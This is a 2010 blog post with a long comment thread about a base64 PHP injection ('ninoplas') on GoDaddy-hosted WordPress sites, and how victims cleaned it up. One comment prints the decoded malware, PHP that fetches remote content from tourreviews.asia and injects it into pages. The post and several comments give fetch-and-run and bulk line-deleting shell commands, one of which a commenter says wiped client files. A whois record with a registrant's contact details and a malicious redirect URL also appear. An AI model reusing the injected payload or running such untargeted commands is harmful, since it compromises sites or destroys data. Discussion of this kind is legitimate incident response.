Inspirated

 
 

March 2, 2010

GoDaddy/WordPress ninoplas Base64 virus and the fix

Filed under: Blog — admin @ 7:40 pm

Update: The virus seems to have affected only GoDaddy websites, hence the change in title.

Few hours ago I opened my website and noticed some rather strange Javascript hanging around the bottom. After some inspection, it became evident that every page on my blog was trying to load an IFrame to some place called ninoplas.com. Turns out, I wasn’t alone and there are other users as well who are affected by this. Judging by the fact that different blogs were attacked at the same time, this was in all probability the result of a security hole in some plugin or the core itself.

The virus acted by adding a piece of encrypted code on the first line of all PHP files on the server. It’s rather unsettling to consider the extend of damage that could have been caused with the write access to those files. Still, the damage could be rectified by simply deleting those lines. I wrote a tiny script for doing this job which cleans the ninoplas virus from all the PHP files in the current directory:

clean-ninoplas.sh

Warning: While this script has worked for me, I am in no way providing any guarantee for how it behaves on other blogs. Backup your blog as well as database before executing this script.
You have been warned.

Using the fix is a simple matter of:

-bash-$ cd wordpress
-bash-$ wget http://inspirated.com/uploads/clean-ninoplas.sh
-bash-$ sh clean-ninoplas.sh

And don’t forget to backup everything again after cleaning up. The security hole — if there is one — has still not been tracked and if it’s in the core or some plugin which you’re still using, the virus might not be so benevolent next time.

Tags: , , , , , , ,

70 Comments »

  1. I’ve changed the needle value to the base64 code found on all of my infected php files.
    Can you please tell me how do I execute this script?
    I’m a newbie in bash.
    Where do I input these commands: cd; wget; sh ?

    Comment by Jugal — March 3, 2010 @ 3:21 am

  2. You need SSH access for entering these commands.

    Seeing as this is probably a GoDaddy issue, this link might help.

    Comment by krkhan — March 3, 2010 @ 7:38 pm

  3. Thanks mate, I’ll try doing this.
    On second thoughts, can’t we make a php script to do the same?

    Comment by Jugal — March 3, 2010 @ 10:37 pm

  4. Can you email me an infected PHP file? I will need that in order to write a PHP script for automating cleanup.

    Comment by krkhan — March 3, 2010 @ 11:18 pm

  5. Thanks for the time mate, please add me on jugal1702@gmail.com I’ll send you there!

    Comment by Jugal — March 3, 2010 @ 11:21 pm

  6. Thanks a lot for the help Kamran. I used the php script you gave.
    Only 1 problem remains now, I had to use the replacement string as ‘ ‘ (space) as blank was not accepted.
    So now I have a space and a blank line before every <?php (<?php starts from 2nd line) and hence no files are working :(
    Any idea how do I batch remove the 1st line?

    Comment by Jugal — March 7, 2010 @ 2:06 am

  7. I am suffering from same virus, can you please send me the php script tp resolve this issue.

    Comment by Srinivas Bobbili — March 8, 2010 @ 12:34 pm

  8. Hi Srinivas, Kamran is busy. Please post your email id, I’ll give it to you.
    Really appreciate his help!

    Comment by Jugal — March 8, 2010 @ 7:15 pm

  9. Jugal, a space and a blank line before start of PHP code should be fine. Anyways, email me some sample PHP files and I’ll have a look.

    Comment by krkhan — March 8, 2010 @ 8:02 pm

  10. This is not new.. its NOT ONLY Godaddy that gets infected.. try searching for: eval base64_decode
    Also look at (oct 2009) : http://www.hostmonsterforum.com/showthread.php?t=6518

    Comment by Danny — March 13, 2010 @ 6:58 pm

  11. One more thing (I have also tracked this back to 2007) – If you want to know what the code does.. do this:

    Edit the .php file and change “eval” to “print”

    You will see the decoded file like this:

    $l=”http://tourreviews.asia/links2/link.php”; if (extension_loaded(“curl”)){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode(“”,file($l));} print @$r;

    Clearly they can change the remote file to do or say anything.

    NOTE: The most important part of this is that your system has been HACKED.
    It is very likely based on the history of this PHP attack that you might have Spyware on your PC that stole your FTP passwords.
    Maybe you have FTP passwords in your email account and that was hacked.
    Do you store your FTP passwords in a text file on your PC?
    Or depending on some versions of WordPress there is a forum/plugin/comment hack that might have been the cause.
    Anyway I suggest you fix your server, scan you pc and change your passwords.

    Remember this is for any Web Server running PHP – Its not specific to WordPress etc.. and not Hosting specific either.

    Comment by Danny — March 13, 2010 @ 7:24 pm

  12. Danny, I am on Linux and I keep a sharp eye on currently executing processes all the time so I have ruled out the spyware scenario. My email account was not hacked or I would have known as I keep a sharp eye on email access too. This leaves a possible security hole in some plugin/core itself.

    How were you able to trace the issue back to 07? That’s interesting to say the least.

    Comment by krkhan — March 13, 2010 @ 10:44 pm

  13. @above 2: Did you also think that you have the database password in the config.php file? Can that be the loophole?

    Btw, I still have the spaces and my files still are not working. Can anyone please provide a script to remove them?

    Comment by Jugal — March 14, 2010 @ 2:19 pm

  14. @Jugal: Oh yes I do! Contact me on killer_kado@inspirated.com

    Comment by Gobhi — March 14, 2010 @ 6:27 pm

  15. Remember this is for any Web Server running PHP – Its not specific to WordPress etc.. and not Hosting specific either.

    Comment by zainuddin — April 1, 2010 @ 3:27 pm

  16. Frankly speaking, the origins of this virus are pretty vague. Though it seems to have affected GoDaddy websites with PHP running.

    Comment by krkhan — April 1, 2010 @ 7:19 pm

  17. When I finally get rid of all the instances of this code, is there a way to be sure there is not a “back door” I have missed???

    I just got hit with this thing at the stroke of midnight, April 1st. The last interested person to successfully register on my website did it last night at 11:00pm. When GoDaddy walked me through restoring with their backup (saved just after midnite), the malicious code was already there. It looks like the code was inserted as the first line in nearly every php file way back on Feb 28th, and it was lurking there until April Fools.

    I am inept with scripts so I have begun the tedious job of removing the code from what will probably be hundreds of php files on my WordPress site.

    Happy Easter to all
    Mike Blackstone

    Comment by Mike Blackstone — April 4, 2010 @ 12:34 pm

  18. Change that: I got hit at the stroke of midnight Apr 2nd, NOT the 1st.

    Comment by Mike Blackstone — April 4, 2010 @ 12:42 pm

  19. Information about ninoplas.com from http://www.robtex.com

    *.ninoplas.com has one IP number , which is the same as for ninoplas.com. ninoplas.com point to the same IP. ninoplas.com is delegated to two nameservers, however two extra nameservers are listed in the zone. *.ninoplas.com is ranked #9276993 world wide as ninoplas.com and is hosted on a server in China. Reputation is not yet known.It is not listed in any blacklists.

    Comment by G.J.Souverein — April 11, 2010 @ 4:58 am

  20. Whois information:

    Domain name: ninoplas.com

    Registrant Contact:
    NewCompany ltd
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Administrative Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Technical Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Billing Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    DNS:
    ns1.everydns.net
    ns2.everydns.net

    Created: 2010-02-05
    Expires: 2011-02-05

    There is some more information about Todd Echols on
    http://www.malwaredomainlist.com/mdl.php?search=91.212.198.137&inactive=on

    Comment by G.J.Souverein — April 11, 2010 @ 5:30 am

  21. Hi Khan,

    My blog hosted with Godaddy has also been hacked.

    I have stated my issue here:
    http://forums.digitalpoint.com/showthread.php?t=1770144

    And i have spent one whole night deleting the “eval base 64″ code
    from wp-admin, wp-content and wp-includes. But later i found that
    the whole php files inside my FTP has the eval code at the top.

    Could you please help me on fixing this?

    Like, how to use your script given above. I have no idea on how to use it.

    Thanks in advance.

    Comment by Hema Latha — April 16, 2010 @ 7:39 am

  22. I’m running a wordpress site and everything is seemingly cleansed from my server. All thanks to everything posted above.

    However, I still have that pesky piece of javascript on the main page source. I’m able to follow code, but I just can’t locate how to edit that line out. Any suggestions on a location to check? I’ve checked all my index.php files and nothing yet.

    Comment by Derek — April 16, 2010 @ 6:11 pm

  23. Hi Derek, I think you are on the right track. I had to check every single .php file on my entire wordpress site and delete that code—it was . If I had to guess, there was one .php file you somehow missed. It was a painstaking process, checking and deleting the code from every single file, but it worked for me.

    As far as the script, my understanding is that it automates and completes that painstaking process for you. I don’t know script either so I did it the hard way manually.

    All the best

    Comment by Mike Blackstone — April 16, 2010 @ 8:34 pm

  24. […] found an article on how to remove it using SSH access, you can check it out here. (Note: I have not tried this script, so I can't say whether it works or […]

    Pingback by WordPress Site Hacked – Ninoplas Base64 Virus | WPSecurityLock — April 17, 2010 @ 1:05 am

  25. Jugal or Kamran can you please mail me the PHP or SSH script to this email address? sandeep[AT]gadgetcage[DOT]com

    Comment by Sandeep — April 17, 2010 @ 1:53 am

  26. For people who’re using GoDaddy account, cleaning the script is actually very easy using SSH access. Here‘s an article which explains how to enable SSH access on your account. Once you have enabled SSH access, use these instructions to login and then use the clean-ninoplas commands listed in the blog post.

    Not only SSH access saves you time, it also makes sure that the virus is purged clean from every PHP file in your account.

    Comment by krkhan — April 17, 2010 @ 11:10 pm

  27. Thanks for this great information and the removal info.

    Regarding SSH, for those that do not have SSH enable at Godaddy it can take up to 72 hours to activate. Any ideas on how to speed things along?

    I’ve been restoring people’s sites through the file manager using the “History” snapshot feature. Have you heard any new information about it’s origin or whether or not it affects the database?

    I received one comment on my blog that this virus sets a cookie that redirects every 20 days. Have you heard anything about this?

    Securely yours,

    Regina Smola

    Comment by WPSecurityLock — April 18, 2010 @ 1:44 am

  28. […] this solution, I came to know that 200+ WordPress blogs are attacked on 14th April, 2010. I found a solution for how to clean this base64 virus for Goddady users. But after executing that code, I can still […]

    Pingback by How to Get rid of base64 Virus on WordPress | Gadget Cage — April 19, 2010 @ 8:03 pm

  29. HELP! My website has also been attacked by something similar to this. I need help! I have the file, but do not know how to run it. My site is http://www.thetechupdate.com and it has been hacked.

    Help! Email me henry{at}thehenry.net

    Comment by Henry D'Andrea — April 22, 2010 @ 11:15 am

  30. […] you have SSH access on your Godaddy  Linux shared hosting account, then you can try the clean-ninoplas.sh script written by krkhan at http://inspirated.com. Since these webmasters did not have SSH enabled, […]

    Pingback by Ninoplas Base64 WordPress Hacked on Godaddy | Case Study | WPSecurityLock — April 22, 2010 @ 5:45 pm

  31. Henry, feel free to contact me at my website. If you don’t have SSH access, then maybe this post may help you – http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Comment by WPSecurityLock — April 22, 2010 @ 5:47 pm

  32. For people who’re having problems executing the script:

    1. Enable SSH on your account
    2. Login using SSH
    3. Execute the following commands:

      wget http://inspirated.com/uploads/clean-ninoplas.sh
      sh clean-ninoplas.sh

    Feel free to comment if you're having any problems with the above steps.

    Comment by krkhan — April 22, 2010 @ 11:30 pm

  33. My old version (2.6/2.7/2.8) WordPress sites at a particular host who is reseller of WildWestDomains, were also attacked yesterday by an “eval base64…” injection. Fortunately I had zip backups of the site folders which I restored and then upgraded the WordPress installations. This removed the malware (hopefully) as the sites are now working.

    I believe, the attacks are happening on WordPress sites with older version installations and it would do well to upgrade all your WordPress installations to the latest version 2.9.2.

    Comment by Sri — April 25, 2010 @ 5:08 pm

  34. @ Sri ..

    The attacks are regardless of the wp versions.

    My site was running the latest wp version and it was hacked.
    Still i couldn’t figure out how it was hacked !

    Comment by Hema Latha — April 25, 2010 @ 5:35 pm

  35. @ K R Khan ..

    “Update: The virus seems to have affected only GoDaddy websites, hence the change in title.”

    Godaddy has denied this when we contacted them via email. Here’s the reply:

    “Measures are in place to protect the overall security of the shared hosting server on which your website resides. The compromise of your account is outside of the scope of security that we provide for you. Virus scans are performed on the content that is hosted, but they may not pick up everything, largely due to the fact that hackers tend to upload custom scripts which are not picked up by traditional malware scanners. However, if a virus is detected, you will be notified. The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you. ”

    Is there anyway to find out how our site’s were hacked ???

    Comment by Hema Latha — April 25, 2010 @ 5:39 pm

  36. […] like to quote a comment submitted by Herma Latha at inspriated.com. "Measures are in place to protect the overall security of the shared hosting server on which your […]

    Pingback by Cechriecom.com Script – WordPress Hacked on Godaddy | Case Study | WPSecurityLock — April 25, 2010 @ 9:11 pm

  37. GoDaddy’s reply is a lot of corporate speak bullcrap. It goes by the assumption that the users’ blogs and website softwares can be compromised using exploits and vulnerabilities and social engineering but somehow the hosting server themselves are prone to everything except viruses which they are scanned for.

    In all probability, this spreads using an exploit of some server-side software. Which is evident from the fact that:

    • There’s a clear bias in victim base, i.e., all the victims share a common hosting company instead of a common WP version.
    • Most of the users who’re hit by this thing had most recent WP versions.
    • I have only heard about one or two hosts where this problem persists.

    Comment by krkhan — April 25, 2010 @ 10:02 pm

  38. Hi,

    I used another ssh command found on a wordpress.org comment and it worked for me. It scans all php files for the base64 code and removes it. The command looks like this find . -type f -name “*.php” -exec sed -i ‘/base64_decode/d’ {} \; , I detailed everything in an article regarding this and how to use it here: http://bit.ly/d5QKsT

    BTW, my comments seem not to appear in the website….maybe they got into your spam folder, can you please check and unspam them?

    Regards,
    Rudi

    Comment by Rudi — April 26, 2010 @ 11:31 am

  39. Rudi, thanks for posting the new script. It does essentially the same thing as the one I have made, there are more than one ways to get the job done.

    Please tell me if you’re facing any further problems with commenting.

    Comment by krkhan — April 27, 2010 @ 3:49 am

  40. […] is GoDaddy’s comment (submitted by Herma Latha at inspriated.com): Measures are in place to protect the overall security of the shared hosting server on which your […]

    Pingback by Wordpress blogs hosted on GoDaddy Hacked « Make This Do – Making The Web Work For You — April 27, 2010 @ 6:04 am

  41. Hi, let’s see if the comment works :)

    Comment by Rudi — April 28, 2010 @ 1:28 pm

  42. How to do that for Joomla CMS . please advice ?

    Comment by Bassem — May 1, 2010 @ 5:58 pm

  43. ITS NOT just godaddy! It’s LOTS of ISPs.

    Comment by ed — May 1, 2010 @ 10:12 pm

  44. WORDPRESS BLOG HACKED AGAIN ……… !!!!!!!!!

    My blog is hacked again.
    I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

    It’s again has the same script in the Page Source:

    And my antivirus program has blocked my site and giving an Alert.
    Site is getting redirected to the below link.

    http:// www1.protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

    All the php files have this code on the first line:

    I feel to Quit blogging.

    Comment by Hema Latha — May 2, 2010 @ 12:28 am

  45. Happened to me again at 6am today.

    This is the fifth time this virus has got me. The last time was about two weeks ago.
    I think this has to be an exploit in Godaddy.

    Comment by Bourgy — May 2, 2010 @ 2:06 am

  46. Hema, I know exactly how you feel. I am tired of cleaning up files. This time I almost lost two thousand pictures I uploaded because I just deleted my entire WordPress folder out of exasperation.

    Luckily I had a backup I made 10days ago.

    Comment by Bourgy — May 2, 2010 @ 2:08 am

  47. Maybe it’s time for us to compare plugins if it’s not just godaddy.

    Are we all using All in One?

    Comment by Bourgy — May 2, 2010 @ 2:11 am

  48. @ Bourgy .. Yes i thought about the plugins. I want to list the plugins i use, but i’m unable to login now.

    I Restored all the files using Godaddy File Manager.

    Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

    But when i tried to Login to Wp-admin, I got this message from AVG:

    Threat was blocked!

    File name: http: / / www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5oWKeih9eipqCecV6aoaXGaorcmpWkcVih1GqTYmKUXpmYkWNrZ2SXlJVfpJmfcaCorKmbXJPPn5SWlaCfzZ%2FOo5PSosWSxqCkYa3Vjs%2BomZ2nYqicqHjTksjPo5WQqJGs02rKpKTWUpaliGN9V2irytGdm5Wnm6GmpKzEmdnIX5OcoVdqqqTSXZHKmszSiGN9WKrYnpRraWZwaHBrbm%2BHodeYbmFfa2RvmGWZZmaMkMahrH9dqZ%2FJnptyag%3D%3D

    Threat name: Exploit Rogue Security Threat Analysis 9type 1007)

    I’m unable to access the wp admin/login panel.

    Comment by Hema Latha — May 2, 2010 @ 2:34 am

  49. On 1st May, 2010 around 10:30 PM (IST) i check my site and it was not affected.
    After an hour when i tried to access my site it was gone, redirecting to a blank page and followed by AVG Alert message.

    THIS IS THE SECOND TIME MY SITE IS HACKED .. !

    After the first attack, i’m using a VERY STRONG password, and installed wp-security plugins suggested by WpSecurityLock.

    I have restored using Godaddy File Manager and the base eval codes have been removed.
    But still when i try to login to Wp-admin, the same issue happens again.

    As suggested by Bourgy, let me list the WP-PLUGINS i use, so that we can compare the commons plugins the hacked sites are using.

    akismet
    all-in-one-seo-pack
    clean-options
    dd-formmailer
    easy-ip2country
    exclude-pages
    exploit-scanner
    facebook-commentstng
    featured-content-gallery
    flv-embed
    get-recent-comments
    gocodes
    google-sitemap-generator
    hide-or-cut-post-text
    link-exchange-for-wp
    login-lockdown
    maintenance-mode
    php-code-widget
    seo-automatic-links
    seo-image
    seo-super-comments
    sexybookmarks
    sitemap-generator
    thank-me-later
    tweetmeme
    wordpress-popular-posts
    wp-pagenavi
    wp-postviews
    wp-secure-remove-wordpress-version
    wp-super-cache
    wp-thumbie

    Previously when my site was hacked, I had a strange PHP file “lira_seville.php”
    But this time i couldn’t find any. And no wierd code in wp-config.

    I guess changing host will fix this issue for ever !

    Comment by Hema Latha — May 2, 2010 @ 3:20 am

  50. have you cleaned your system?
    Deleted cookie etc.

    You really should. Try downloading CCleaner

    Comment by Bourgy — May 2, 2010 @ 3:23 am

  51. ISSUE RESOLVED TEMPORARILY

    1. Restored files using Godaddy file manager.

    After restoration, site worked but the Login/Admin page was redirected to the virus site.

    2. Replaced Wp-admin & Wp-includes.

    Issue resolved.

    WAITING FOR THE THIRD ATTACK

    Comment by Hema Latha — May 2, 2010 @ 4:46 am

  52. I fixed the virus on my site using the script provided in the post, which deleted the code from every PHP line automatically. Then I chose a strong password and since then I haven’t been hit by the thing again.

    I guess the difference is, I used the script in my root directory and hence all PHP files were cleaned. Cleaning them by hand or cleaning them in a subdirectory is bound to leave some infected ones and they can in turn re-infect all the other files.

    I have many of those plugins as well, but it will be difficult figuring out which one is the culprit.

    And please make regular backups :) .

    Comment by krkhan — May 2, 2010 @ 12:22 pm

  53. […] a topic in the WordPress support forums that supported that approximate time. However, I also found another post elsewhere with a Unix/Linux shell script that would fix what appears to be the same issue which was […]

    Pingback by Arcane Palette Creative Design » Blog Archive » GoDaddy-hosted sites at risk — WordPress, Joomla!, Pligg, ZenCart, others… :: creative web design — May 4, 2010 @ 1:26 am

  54. […] a topic in the WordPress support forums that supported that approximate time. However, I also found another post elsewhere with a Unix/Linux shell script that would fix what appears to be the same issue which was […]

    Pingback by jazzsequence :: arcane palette :: GoDaddy-hosted sites at risk — WordPress, Joomla!, Pligg, ZenCart, others… — May 4, 2010 @ 8:57 pm

  55. I have 100 domains on Godaddy and i can say that this company is very reputable.**”

    Comment by Nevaeh Green — May 5, 2010 @ 1:03 pm

  56. Yes, godaddy is pretty ok by me, and i do hosts lots of sites there.

    however they were hit by this virus, big time. i think they should have been a bit more on top of it. just saying.

    Comment by ed — May 5, 2010 @ 2:17 pm

  57. Go Daddy is making strong efforts to reach out to the community. Today, they are going to be speaking at our free WordPress Security teleseminar at 2pm EST. We welcome you to join us: http://www.wpsecuritylock.com/wpsecurity0505

    Comment by WPSecurityLock — May 5, 2010 @ 7:52 pm

  58. […] after the virus was first identified, someone helpful at Inspirated.com released a script to fix the problem. Fixing the process manually is very difficult because when the site is compromised, every PHP file […]

    Pingback by Manually Correcting the GoDaddy Wordpress Virus Ninoplas | Finding Great Web Hosting — May 10, 2010 @ 2:05 am

  59. Is it possible for a Javascript command to get to the php code in order to modify them (adding the eval(base64 lines in each .php file) that way?

    I suspect of a click tracking (which generates a “heat map” of your site) from time ago.

    My partner recommended it me, because “all SEO use it” but when I traced the code, it was hosted in a public place, not in a proud programmer’s site as a honest company would do…
    http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/5758.js

    The script was full of encripted functions.

    Is that possible?

    I have a Linux Deluxe account too.
    Too many coincidences?

    Last, I’d suspect of some plugins I installed with 0 feedback and (surprisingly) didn’t worked at all. That last one I call it “stupidity” by my part.

    Comment by sergio — May 11, 2010 @ 11:07 am

  60. Here’s my php code that can be run from the browser. You MUST edit this to suit your situation.

    You must have safe mode off in php for it to work. Please read the comments inline.

    <?php
    //You will have to change this to your specific base64_encode
    $needle='aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJ . . . .  edit this for your specific base64_encode';
     
    //Uncomment if you need to find your path
    //$output = shell_exec("pwd");
     
    //Uncomment to check for infected files edit the path here
    //$output = shell_exec("grep -rl $needle /home/content/your/path/to/html");
     
    //Uncomment to cleanup infected files edit hte path here
    //$output = shell_exec("grep -rl $needle /home/content/your/path/to//html | xargs sed -i '1d'");
     
    //Output
    echo "$output";
    ?>

    Comment by carcus — May 12, 2010 @ 1:10 pm

  61. @sergio: AFAIK, this JS script does nothing like that. It just redirects. We still don’t know how it got there in the first place.

    @carcus: Thanks for the script. Hope it helps the others.

    Comment by krkhan — May 12, 2010 @ 2:48 pm

  62. @carcus – Thanks a ton for the php script. Just used it to clean up a whole slew of infected WP sites. You’re a life-saver!

    Comment by Justin — May 14, 2010 @ 1:21 am

  63. Glad I could help. Here’s a tip: make it non writeable after you use it and make sure to comment out what you don’t want to be run again. Our clean up script got hit and run again removing the first like of every file recursively from root. Client did not keep good backups. Use at your own risk!

    Comment by carcus — May 14, 2010 @ 5:24 am

  64. Hi.
    I have had my godaddy website hacked with this virus 5 times in the last 3 weeks. I am now savvy enough to backup a clean copy (at least I think its clean) every night, and as I make constant daily changes have virtually been able to pick the exact time the virus infects again and quickly grab my backup and upload straight away which seems to delete the virus from ALL my websites infected but then it comes back within a few days.

    As these websites are not WP sites as most people seem to have had problems with, can I do the SSH thing above to get rid of it or any suggestions as I can’t do the restore with godaddy due to the amount of changes done during the day and any restore could have part of the malicious code on it anyway.

    I manually go through and clean every .php page but wonder if I am missing something on other types of pages.

    I need some layman terms in what I need to do to clean it off forever. I have deleted any databases I had, all forum stuff everything to try not to let it come back including changing all passwords on hosting, ftp and account with godaddy

    Appreciate any advice thanks
    Serena

    Comment by serena — May 17, 2010 @ 5:51 pm

  65. i have also been victim of the ninoplas virus, but am haPpy to say i was able to remove it by doing a little searching.

    I was looking for an alternative to reinstalling all the original wordpress files, plugins, themes, etc., so i looked through a number of different files and didnt find anything until i got to the files in my themes folder.

    THE ONLY FILE THAT WAS INFECTED WAS THE HEADER.PHP FILE IN THE NAKED_HTML5 THEME. THERE WAS A LONG STRING OF CODE ADDED TO THE TOP ABOVE THE OPENING TAG. ONCE I REMOVED THE STRING OF CODE THE PROBLEM WAS FIXED!!!

    Comment by Adam — May 19, 2010 @ 9:43 am

  66. I uninstalled every copy of WordPress that I had on my site and deleted my WordPress database after backing it up and moving the backup off of my server, and guess what? I STILL got hacked again. And then I found out that I had a folder in the top level directory that was publicly writable. I deleted that and I haven’t had any problems so far.

    Comment by spo — May 19, 2010 @ 7:46 pm

  67. i have also been victim of the ninoplas virus, but am haPpy to say i was able to remove it by doing a little searching.

    I was looking for an alternative to reinstalling all the original wordpress files, plugins, themes, etc., so i looked through a number of different files and didnt find anything until i got to the files in my themes folder.

    THE ONLY FILE THAT WAS INFECTED WAS THE HEADER.PHP FILE IN THE NAKED_HTML5 THEME. THERE WAS A LONG STRING OF CODE ADDED TO THE TOP ABOVE THE OPENING TAG. ONCE I REMOVED THE STRING OF CODE THE PROBLEM WAS FIXED!!!

    Comment by Bruce — May 19, 2010 @ 9:24 pm

  68. Long time viewer / first time poster. Really enjoy reading the blog, keep up the good work. Will definitely start posting more in the near future.

    Comment by Robena Eng — October 23, 2010 @ 2:17 pm

  69. godaddy is not always the best registrar, the private registration of godaddy is too expensive -

    Comment by Concrete Molds · — November 8, 2010 @ 3:30 pm

  70. check out this url

    GoDaddy/WordPress ninoplas Base64 virus and the fix | Inspirated

    Trackback by check out this url — November 27, 2014 @ 5:23 pm

RSS feed for comments on this post. TrackBack URL

Leave a comment